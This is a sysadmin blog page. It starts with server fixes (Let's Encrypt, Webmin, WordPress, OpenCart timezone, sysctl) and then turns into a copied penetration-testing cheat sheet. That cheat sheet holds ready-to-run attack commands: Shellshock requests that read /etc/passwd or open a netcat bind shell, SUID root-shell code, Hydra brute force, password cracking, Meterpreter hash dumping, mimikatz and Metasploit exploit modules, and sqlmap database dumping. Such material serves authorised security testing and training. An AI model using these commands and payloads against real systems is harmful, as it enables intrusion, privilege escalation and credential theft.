HP Server – Page 14 – Learning the hard way ;-)

Let’s Encrypt automatic renewal problem!

I ran into a problem with one of my domain name about a week ago! The problem was related to the automatic renewal of Let’s Encrypt SSL Key. There is a easy fix out there, on this server I am using .htaccess to forward all traffic to https:// the fix is to remove or rename the .htaccess until the SSL key is renewed.

As per today 5-19-2017 Let’s Encrypt gateway make a time-out!

Source : https://statusgator.com/services/lets-encrypt

Cheers

Update :

A new certificate was successfully requested from Let’s Encrypt, and installed for easy-admin.ca, www.easy-admin.ca.

🙂

You lost your Webmin password? No problem!

How to reset Webmin root password?

At times we often forget the webmin password for a given user, say root, or after repeated failed login attempts webmin locks the account and no one cannot login anymore. In this case you need to wait for couple, three minutes and you will be able to try to login again. However, if you’ve forgotten your password and need to change it, then login to the server via ssh and run the following command:

For RHEL/CentOS:

/usr/libexec/webmin/changepass.pl /etc/webmin root NEWPASSWORD

The package could not be installed.

PCLZIP_ERR_MISSING_FILE (-4) : Missing archive file

If WP detects that it cannot write files to your /tmp/…. directory, then you get the error message like “The package could not be installed. PCLZIP_ERR_MISSING_FILE (-4) : Missing archive file”

Solution:

You can work around this by specifying a new temp directory on your server with a place that you know WordPress is allowed to write files to. You can do this by adding this line of code into the wp-config.php file.

1. Find the links blow
if ( !defined(‘ABSPATH’) )
define(‘ABSPATH’, dirname(__FILE__) . ‘/’);

2. Add lines below
/** Specify wordpress temp dir */
define(‘WP_TEMP_DIR’, ABSPATH . ‘wp-content/temp‘);

3. Open wp-content folder,
and create a new folder on your CENTOS Server named “temp“ and make sure you set the right CHOWN for your new created directory!

Try again, you will see it works like a charm.

Easy Fix here!

How to change OpenCart Timezone

OpenCart used globally and operated from different timezone based on site owner place. In most case, OpenCart site run in UTC timezone. This affecting all aspect depend on the time configuration, from product comment, special price to order history.

This is not issue if you can accept the time difference; but of course it’s not logical for the site owner confused either an order is placed today or yesterday because the OpenCart site time is different from their local.

This tutorial covering not just change PHP timezone but also synchronize it with database. Lets start the tutorial with most case assumption that the OpenCart site is run on UTC timezone. To visualize this we use the free extension System Information as on image below.

For this tutorial, I use OpenCart v2.2.x that might be different from your OpenCart version. In order to use this tutorial for your site, you need to do adjustment where the code should change.

Change PHP Timezone

There is two method to change PHP timezone, through php.ini or set them at PHP file directly. To change timezone in php.ini you can ask your hosting provider, because one host to another have different approach.

To use the second method, we will change system/startup.php with PHP supported timezone.

// if (!ini_get('date.timezone')) {      
//   date_default_timezone_set('UTC');       
// }
date_default_timezone_set('Australia/Sydney');

On code above I commented the OpenCart code because I have date.timezone configured in php.ini. This change will give us result:

Most tutorial on change OpenCart timezone finish at this stage. But this is actually wrong. I purposely set the timezone to Australia/Sydney because I know the time different when write this tutorial will be one day with database time that still use UTC.

If you add product review now, which is added to database with sql query now() the date added is 20/03/2016, even though PHP time is March 21, 2016. This will make you think the review is maded yesterday, even though it’s just 5 minute ago.

OpenCart 2.2 have 275+ sql query that use now() and this mean the same thing will happen to Product Special Price, Coupon Code, Voucher, Order, Return and more. If you change PHP timezone, make sure to synchronize with database.

Synchronize PHP and Database Timezone

Synchronize php and database timezone is done by set the database connection timezone. We can try to set global database timezone but that need super privillage user which is not available on shared hosting. Query we use to set database timezone:

SET time_zone='offset';

We use offset and not named timezone because, quoted from MySQL: “Named time zones can be used only if the time zone information tables in the mysql database have been created and populated”. There is no guarantee all hosting have timezone information table in their database instances.

To change OpenCart database connection timezone, we will change system/library/db/mysqli.php and add code below after $this->connection->query(“SET SQL_MODE = ””);

$dt = new \DateTime();
$this->connection->query("SET time_zone='" . $dt->format('P') . "';");
In OpenCart 2.0.x and 2.1.x change $this->connection to $this->link.Since System Information use OcMod to get Database info, it’s important to refresh modification at Extensions > Modification before check the result. This change will give us result:
You can see on image above that date time on PHP and Database is now synchronized.

7 Days to Die is a survival horde crafting game for PC ;-)

With over 1.5 million copies sold on PC (digital download), 7 Days to Die has redefined the survival genre, with unrivaled crafting and world-building content. Set in a brutally unforgiving post-apocalyptic world overrun by the undead, 7 Days to Die is an open-world game that is a unique combination of first person shooter, survival horror, tower defense, and role-playing games. It presents combat, crafting, looting, mining, exploration, and character growth, in a way that has seen a rapturous response from fans worldwide. Play the definitive zombie survival sandbox RPG that came first. Navezgane awaits!

7DaysToDie.com

R.I.P ~ T H E R O B !
1973 – 2017

The “unhide” command used by rkhunter!

The unhide command for RKHUNTER in CentOS 7 must be installed with the following “Yum” command:

yum install unhide unhide-tcp

I have detected that rkhunter need this file to be able to unhide stuff!

Info: Starting test name ‘malware’
Performing malware checks
Info: Test ‘deleted_files’ disabled at users request.
Info: Starting test name ‘running_procs’
Checking running processes for suspicious files [ None found ]
Info: Starting test name ‘hidden_procs’
Info: Unable to find the ‘unhide’ command
Info: Unable to find the ‘unhide-linux’ command
Checking for hidden processes
[ Skipped ]

rkhunter command line

rkhunter help

Have Phun!

YUM Commands

Package manager used by RPM based systems, you can pull some usefull information about installed packages and or install additional tools.

COMMAND	DESCRIPTION
`yum update`	Update all RPM packages with YUM, also shows whats out of date.
`yum update httpd`	Update individual packages, in this example HTTPD (Apache).
`yum install package`	Install a package using YUM.
`yum --exclude=package kernel* update`	Exclude a package from being updates with YUM.
`yum remove package`	Remove package with YUM.
`yum erase package`	Remove package with YUM.
`yum list package`	Lists info about yum package.
`yum provides httpd`	What a packages does, e.g Apache HTTPD Server.
`yum info httpd`	Shows package info, architecture, version etc.
`yum localinstall blah.rpm`	Use YUM to install local RPM, settles deps from repo.
`yum deplist package`	Shows deps for a package.
`yum list installed \| more`	List all installed packages.
`yum grouplist \| more`	Show all YUM groups.
`yum groupinstall 'Development Tools'`	Install YUM group.

CentOS 7 System Information Commands

System Information Commands

Useful for local enumeration.

COMMAND	DESCRIPTION
`whoami`	Shows currently logged in user on Linux.
`id`	Shows currently logged in user and groups for the user.
`last`	Shows last logged in users.
`mount`	Show mounted drives.
`df -h`	Shows disk usage in human readable output.
`echo "user:passwd" \| chpasswd`	Reset password in one line.
`getent passwd`	List users on Linux.
`strings /usr/local/bin/blah`	Shows contents of none text files, e.g. whats in a binary.
`uname -ar`	Shows running kernel version.
`PATH=$PATH:/my/new-path`	Add a new PATH, handy for local FS manipulation.
`history`	Show bash history, commands the user has entered previously.

Sysctl Security

#nano /etc/sysctl.conf

net.ipv4.ip_forward = 0
net.ipv4.conf.all.send_redirects = 0
net.ipv4.conf.default.send_redirects = 0
net.ipv4.tcp_max_syn_backlog = 1280
net.ipv4.icmp_echo_ignore_broadcasts = 1
net.ipv4.conf.all.accept_source_route = 0
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.all.secure_redirects = 0
net.ipv4.conf.all.log_martians = 1
net.ipv4.conf.default.accept_source_route = 0
net.ipv4.conf.default.accept_redirects = 0
net.ipv4.conf.default.secure_redirects = 0
net.ipv4.icmp_echo_ignore_broadcasts = 1
net.ipv4.icmp_ignore_bogus_error_responses = 1
net.ipv4.tcp_syncookies = 1
net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.default.rp_filter = 1
net.ipv4.tcp_timestamps = 0

Notes

BOF / Exploit

Exploit Research

Find exploits for enumerated hosts / services.

COMMAND	DESCRIPTION
`searchsploit windows 2003 \| grep -i local`	Search exploit-db for exploit, in this example windows 2003 + local esc
`site:exploit-db.com exploit kernel <= 3`	Use google to search exploit-db.com for exploits
`grep -R "W7" /usr/share/metasploit-framework /modules/exploit/windows/*`	Search metasploit modules using grep – msf search sucks a bit

Searching for Exploits

Install local copy of exploit-db:

 searchsploit –u
 searchsploit apache 2.2
 searchsploit "Linux Kernel"
 searchsploit linux 2.6 | grep -i ubuntu | grep local

Compiling Windows Exploits on Kali

  wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
  wine mingw-get-setup.exe
  select mingw32-base
  cd /root/.wine/drive_c/windows
  wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
  cd /root/.wine/drive_c/MinGW/bin
  wine gcc -o ability.exe /tmp/exploit.c -lwsock32
  wine ability.exe

Cross Compiling Exploits

gcc -m32 -o output32 hello.c (32 bit)
gcc -m64 -o output hello.c (64 bit)

Exploiting Common Vulnerabilities

Exploiting Shellshock

A tool to find and exploit servers vulnerable to Shellshock:

git clone https://github.com/nccgroup/shocker

./shocker.py -H TARGET  --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose

cat file (view file contents)

echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80

Shell Shock run bind shell

echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80

Shell Shock reverse Shell

nc -l -p 443

Simple Local Web Servers

Python local web server command, handy for serving up shells and exploits on an attacking machine.

COMMAND	DESCRIPTION
`python -m SimpleHTTPServer 80`	Run a basic http server, great for serving up shells etc
`python3 -m http.server`	Run a basic Python3 http server, great for serving up shells etc
`ruby -rwebrick -e "WEBrick::HTTPServer.new (:Port => 80, :DocumentRoot => Dir.pwd).start"`	Run a ruby webrick basic http server
`php -S 0.0.0.0:80`	Run a basic PHP http server

Mounting File Shares

How to mount NFS / CIFS, Windows and Linux file shares.

COMMAND	DESCRIPTION
`mount 192.168.1.1:/vol/share /mnt/nfs`	Mount NFS share to `/mnt/nfs`
`mount -t cifs -o username=user,password=pass ,domain=blah //192.168.1.X/share-name /mnt/cifs`	Mount Windows CIFS / SMB share on Linux at `/mnt/cifs` if you remove password it will prompt on the CLI (more secure as it wont end up in bash_history)
`net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no`	Mount a Windows share on Windows from the command line
`apt-get install smb4k -y`	Install smb4k on Kali, useful Linux GUI for browsing SMB shares

HTTP / HTTPS Webserver Enumeration

COMMAND	DESCRIPTION
`nikto -h 192.168.1.1`	Perform a nikto scan against target
`dirbuster`	Configure via GUI, CLI input doesn’t work most of the time

Packet Inspection

COMMAND	DESCRIPTION
`tcpdump tcp port 80 -w output.pcap -i eth0`	tcpdump for port 80 on interface eth0, outputs to output.pcap

Username Enumeration

Some techniques used to remotely enumerate users on a target system.

SMB User Enumeration

COMMAND	DESCRIPTION
`python /usr/share/doc/python-impacket-doc/examples /samrdump.py 192.168.XXX.XXX`	Enumerate users from SMB
`ridenum.py 192.168.XXX.XXX 500 50000 dict.txt`	RID cycle SMB / enumerate users from SMB

SNMP User Enumeration

COMMAND	DESCRIPTION
`snmpwalk public -v1 192.168.X.XXX 1 \|grep 77.1.2.25 \|cut -d” “ -f4`	Enmerate users from SNMP
`python /usr/share/doc/python-impacket-doc/examples/ samrdump.py SNMP 192.168.X.XXX`	Enmerate users from SNMP
`nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt (then grep)`	Search for SNMP servers with nmap, grepable output

Passwords

Wordlists

COMMAND	DESCRIPTION
`/usr/share/wordlists`	Kali word lists

Brute Forcing Services

Hydra FTP Brute Force

COMMAND	DESCRIPTION
`hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX ftp -V`	Hydra FTP brute force

Hydra POP3 Brute Force

COMMAND	DESCRIPTION
`hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX pop3 -V`	Hydra POP3 brute force

Hydra SMTP Brute Force

COMMAND	DESCRIPTION
`hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V`	Hydra SMTP brute force

Use -t to limit concurrent connections, example: -t 15

Password Cracking

John The Ripper – JTR

COMMAND	DESCRIPTION
`john --wordlist=/usr/share/wordlists/rockyou.txt hashes`	JTR password cracking
`john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt`	JTR forced descrypt cracking with wordlist
`john --format=descrypt hash --show`	JTR forced descrypt brute force cracking

Windows Penetration Testing Commands

See Windows Penetration Testing Commands.

Linux Penetration Testing Commands

See Linux Commands Cheat Sheet (right hand menu) for a list of Linux Penetration testing commands, useful for local system enumeration.

Compiling Exploits

Some notes on compiling exploits.

Identifying if C code is for Windows or Linux

C #includes will indicate which OS should be used to build the exploit.

COMMAND	DESCRIPTION
`process.h, string.h, winbase.h, windows.h, winsock2.h`	Windows exploit code
`arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h`	Linux exploit code

Build Exploit GCC

Compile exploit gcc.

COMMAND	DESCRIPTION
`gcc -o exploit exploit.c`	Basic GCC compile

GCC Compile 32Bit Exploit on 64Bit Kali

Handy for cross compiling 32 bit binaries on 64 bit attacking machines.

COMMAND	DESCRIPTION
`gcc -m32 exploit.c -o exploit`	Cross compile 32 bit binary on 64 bit Linux

Compile Windows .exe on Linux

Build / compile windows exploits on Linux, resulting in a .exe file.

COMMAND	DESCRIPTION
`i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe`	Compile windows .exe on Linux

SUID Binary

Often SUID C binary files are required to spawn a shell as a superuser, you can update the UID / GID and shell as required.

below are some quick copy and pate examples for various shells:

SUID C Shell for /bin/bash

int main(void){
       setresuid(0, 0, 0);
       system("/bin/bash");
}

SUID C Shell for /bin/sh

int main(void){
       setresuid(0, 0, 0);
       system("/bin/sh");
}

Building the SUID Shell binary

gcc -o suid suid.c

For 32 bit:

gcc -m32 -o suid suid.c

Reverse Shells

See Reverse Shell Cheat Sheet for a list of useful Reverse Shells.

TTY Shells

Tips / Tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like su from reverse shells.

Python TTY Shell Trick

python -c 'import pty;pty.spawn("/bin/bash")'

echo os.system('/bin/bash')

Spawn Interactive sh shell

/bin/sh -i

Spawn Perl TTY Shell

exec "/bin/sh";
perl —e 'exec "/bin/sh";'

Spawn Ruby TTY Shell

exec "/bin/sh"

Spawn Lua TTY Shell

os.execute('/bin/sh')

Spawn TTY Shell from Vi

Run shell commands from vi:

:!bash

Spawn TTY Shell NMAP

!sh

Metasploit

Some basic Metasploit stuff, that I have found handy for reference.

Basic Metasploit commands, useful for reference, for pivoting see – Meterpreter Pivoting techniques.

Meterpreter Payloads

Windows reverse meterpreter payload

COMMAND	DESCRIPTION
`set payload windows/meterpreter/reverse_tcp`	Windows reverse tcp payload

Windows VNC Meterpreter payload

COMMAND DESCRIPTION

COMMAND	DESCRIPTION
`set payload windows/vncinject/reverse_tcp` `set ViewOnly false`	Meterpreter Windows VNC Payload

set payload windows/vncinject/reverse_tcp

set ViewOnly false

Meterpreter Windows VNC Payload

Linux Reverse Meterpreter payload

COMMAND	DESCRIPTION
`set payload linux/meterpreter/reverse_tcp`	Meterpreter Linux Reverse Payload

Meterpreter Cheat Sheet

Useful meterpreter commands.

COMMAND	DESCRIPTION
`upload file c:\\windows`	Meterpreter upload file to Windows target
`download c:\\windows\\repair\\sam /tmp`	Meterpreter download file from Windows target
`download c:\\windows\\repair\\sam /tmp`	Meterpreter download file from Windows target
`execute -f c:\\windows\temp\exploit.exe`	Meterpreter run .exe on target – handy for executing uploaded exploits
`execute -f cmd -c`	Creates new channel with cmd shell
`ps`	Meterpreter show processes
`shell`	Meterpreter get shell on the target
`getsystem`	Meterpreter attempts priviledge escalation the target
`hashdump`	Meterpreter attempts to dump the hashes on the target
`portfwd add –l 3389 –p 3389 –r target`	Meterpreter create port forward to target machine
`portfwd delete –l 3389 –p 3389 –r target`	Meterpreter delete port forward

Common Metasploit Modules

Top metasploit modules.

Remote Windows Metasploit Modules (exploits)

COMMAND	DESCRIPTION
`use exploit/windows/smb/ms08_067_netapi`	MS08_067 Windows 2k, XP, 2003 Remote Exploit
`use exploit/windows/dcerpc/ms06_040_netapi`	MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit
`use exploit/windows/smb/ ms09_050_smb2_negotiate_func_index`	MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit

Local Windows Metasploit Modules (exploits)

COMMAND	DESCRIPTION
`use exploit/windows/local/bypassuac`	Bypass UAC on Windows 7 + Set target + arch, x86/64

Auxilary Metasploit Modules

COMMAND	DESCRIPTION
`use auxiliary/scanner/http/dir_scanner`	Metasploit HTTP directory scanner
`use auxiliary/scanner/http/jboss_vulnscan`	Metasploit JBOSS vulnerability scanner
`use auxiliary/scanner/mssql/mssql_login`	Metasploit MSSQL Credential Scanner
`use auxiliary/scanner/mysql/mysql_version`	Metasploit MSSQL Version Scanner
`use auxiliary/scanner/oracle/oracle_login`	Metasploit Oracle Login Module

Metasploit Powershell Modules

COMMAND	DESCRIPTION
`use exploit/multi/script/web_delivery`	Metasploit powershell payload delivery module
`post/windows/manage/powershell/exec_powershell`	Metasploit upload and run powershell script through a session
`use exploit/multi/http/jboss_maindeployer`	Metasploit JBOSS deploy
`use exploit/windows/mssql/mssql_payload`	Metasploit MSSQL payload

Post Exploit Windows Metasploit Modules

Windows Metasploit Modules for privilege escalation.

COMMAND	DESCRIPTION
`run post/windows/gather/win_privs`	Metasploit show privileges of current user
`use post/windows/gather/credentials/gpp`	Metasploit grab GPP saved passwords
`load mimikatz -> wdigest`	Metasplit load Mimikatz
`run post/windows/gather/local_admin_search_enum`	Idenitfy other machines that the supplied domain user has administrative access to
`run post/windows/gather/smart_hashdump`	Automated dumping of sam file, tries to esc privileges etc

ASCII Table Cheat Sheet

Useful for Web Application Penetration Testing, or if you get stranded on Mars and need to communicate with NASA.

ASCII	CHARACTER
`x00`	Null Byte
`x08`	BS
`x09`	TAB
`x0a`	LF
`x0d`	CR
`x1b`	ESC
`x20`	SPC
`x21`	!
`x22`	“
`x23`	#
`x24`	$
`x25`	%
`x26`	&
`x27`	`
`x28`	(
`x29`	)
`x2a`	*
`x2b`	+
`x2c`	,
`x2d`	–
`x2e`	.
`x2f`	/
`x30`	0
`x31`	1
`x32`	2
`x33`	3
`x34`	4
`x35`	5
`x36`	6
`x37`	7
`x38`	8
`x39`	9
`x3a`	:
`x3b`	;
`x3c`	<
`x3d`	=
`x3e`	>
`x3f`	?
`x40`	@
`x41`	A
`x42`	B
`x43`	C
`x44`	D
`x45`	E
`x46`	F
`x47`	G
`x48`	H
`x49`	I
`x4a`	J
`x4b`	K
`x4c`	L
`x4d`	M
`x4e`	N
`x4f`	O
`x50`	P
`x51`	Q
`x52`	R
`x53`	S
`x54`	T
`x55`	U
`x56`	V
`x57`	W
`x58`	X
`x59`	Y
`x5a`	Z
`x5b`	[
`x5c`	\
`x5d`	]
`x5e`	^
`x5f`	_
`x60`	`
`x61`	a
`x62`	b
`x63`	c
`x64`	d
`x65`	e
`x66`	f
`x67`	g
`x68`	h
`x69`	i
`x6a`	j
`x6b`	k
`x6c`	l
`x6d`	m
`x6e`	n
`x6f`	o
`x70`	p
`x71`	q
`x72`	r
`x73`	s
`x74`	t
`x75`	u
`x76`	v
`x77`	w
`x78`	x
`x79`	y
`x7a`	z

CISCO IOS Commands

A collection of useful Cisco IOS commands.

COMMAND	DESCRIPTION
`enable`	Enters enable mode
`conf t`	Short for, configure terminal
`(config)# interface fa0/0`	Configure FastEthernet 0/0
`(config-if)# ip addr 0.0.0.0 255.255.255.255`	Add ip to fa0/0
`(config-if)# ip addr 0.0.0.0 255.255.255.255`	Add ip to fa0/0
`(config-if)# line vty 0 4`	Configure vty line
`(config-line)# login`	Cisco set telnet password
`(config-line)# password YOUR-PASSWORD`	Set telnet password
`# show running-config`	Show running config loaded in memory
`# show startup-config`	Show sartup config
`# show version`	show cisco IOS version
`# show session`	display open sessions
`# show ip interface`	Show network interfaces
`# show interface e0`	Show detailed interface info
`# show ip route`	Show routes
`# show access-lists`	Show access lists
`# dir file systems`	Show available files
`# dir all-filesystems`	File information
`# dir /all`	SHow deleted files
`# terminal length 0`	No limit on terminal output
`# copy running-config tftp`	Copys running config to tftp server
`# copy running-config startup-config`	Copy startup-config to running-config

Cryptography

Hash Lengths

HASH	SIZE
MD5 Hash Length	`16 Bytes`
SHA-1 Hash Length	`20 Bytes`
SHA-256 Hash Length	`32 Bytes`
SHA-512 Hash Length	`64 Bytes`

Hash Examples

Likely just use hash-identifier for this but here are some example hashes:

HASH	EXAMPLE
MD5 Hash Example	`8743b52063cd84097a65d1633f5c74f5`
MD5 $PASS:$SALT Example	`01dfae6e5d4d90d9892622325959afbe:7050461`
MD5 $SALT:$PASS	`f0fda58630310a6dd91a7d8f0a4ceda2:4225637426`
SHA1 Hash Example	`b89eaac7e61417341b710b727768294d0e6a277b`
SHA1 $PASS:$SALT	`2fc5a684737ce1bf7b3b239df432416e0dd07357:2014`
SHA1 $SALT:$PASS	`cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024`
SHA-256	`127e6fbfe24a750e72930c220a8e138275656b 8e5d8f48a98c3c92df2caba935`
SHA-256 $PASS:$SALT	`c73d08de890479518ed60cf670d17faa26a4a7 1f995c1dcc978165399401a6c4`
SHA-256 $SALT:$PASS	`eb368a2dfd38b405f014118c7d9747fcc97f4 f0ee75c05963cd9da6ee65ef498:560407001617`
SHA-512	`82a9dda829eb7f8ffe9fbe49e45d47d2dad9 664fbb7adf72492e3c81ebd3e29134d9bc 12212bf83c6840f10e8246b9db54a4 859b7ccd0123d86e5872c1e5082f`
SHA-512 $PASS:$SALT	`e5c3ede3e49fb86592fb03f471c35ba13e8 d89b8ab65142c9a8fdafb635fa2223c24e5 558fd9313e8995019dcbec1fb58414 6b7bb12685c7765fc8c0d51379fd`
SHA-512 $SALT:$PASS	`976b451818634a1e2acba682da3fd6ef a72adf8a7a08d7939550c244b237c72c7d4236754 4e826c0c83fe5c02f97c0373b6b1 386cc794bf0d21d2df01bb9c08a`
NTLM Hash Example	`b4b9b02e6f09a9bd760f388b67351e2b`

SQLMap Examples

COMMAND	DESCRIPTION
`sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3`	Automated sqlmap scan
`sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/blah.php"`	Targeted sqlmap scan
`sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump`	Scan url for union + error based injection with mysql backend and use a random user agent + database dump
`sqlmap -o -u "http://meh.com/form/" --forms`	sqlmap check form for injection
`sqlmap -o -u "http://meh/vuln-form" --forms -D database-name -T users --dump`	sqlmap dump and crack hashes for table users on database-name.